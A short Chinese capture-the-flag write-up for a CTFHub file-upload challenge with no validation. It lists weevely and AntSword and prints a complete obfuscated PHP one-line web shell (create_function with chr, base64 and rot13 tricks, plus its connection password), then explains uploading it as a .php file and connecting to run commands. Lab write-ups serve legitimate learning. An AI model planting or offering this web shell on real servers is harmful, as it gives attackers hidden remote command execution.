CTFHub技能樹-Web-文件上傳-無驗證

目錄

• 題目
• 思路
• 工具
• 解法

若是你沒有在 cnblog 做者爲 carr0t2 中看到此文章，建議訪問 原網頁以獲取更好的排版，圖片體驗

題目

思路

• 上傳一句話木馬，獲取shell

工具

一、weevely，kali自帶，能夠生成一句話木馬
二、中國蟻劍 https://github.com/AntSwordProject/antSword
windows下圖形化的軟件，下載安裝都容易，升級版的中國菜刀

解法

一、用中國蟻劍裏的插件作的一句話木馬 名字是 生成shell

二、安裝完後生成

三、很是高級

<?php // 使用時請刪除此行, 鏈接密碼: amNtMUqc ?>
<?php $hgey=create_function(chr(31536/876).chr(0646-0463).chr(01531-01352).base64_decode('bQ==').str_rot13('r'),chr(0175666/01176).chr(738-620).base64_decode('YQ==').base64_decode('bA==').chr(01641-01571).chr(20196/561).chr(0407-0224).str_rot13('b').chr(98100/900).chr(0x220-0x1bb).base64_decode('KQ==').base64_decode('Ow=='));$hgey(base64_decode('OTIzO'.'DU1O0'.'BldkF'.'sKCRf'.''.chr(909-824).chr(0163375/01531).chr(0x15a-0x121).str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').str_rot13('g').chr(231-127).str_rot13('o').base64_decode('VQ==').''.'50TVV'.'xY10p'.'OzI3N'.'zE1Nj'.'U7'.''));?>

四、沒有驗證就很簡單了，直接保存到文本里，後綴改.php，上傳就能夠了

五、填入地址，填入密碼

六、而後就能執行shell，查看目錄，上一層目錄找一下就有了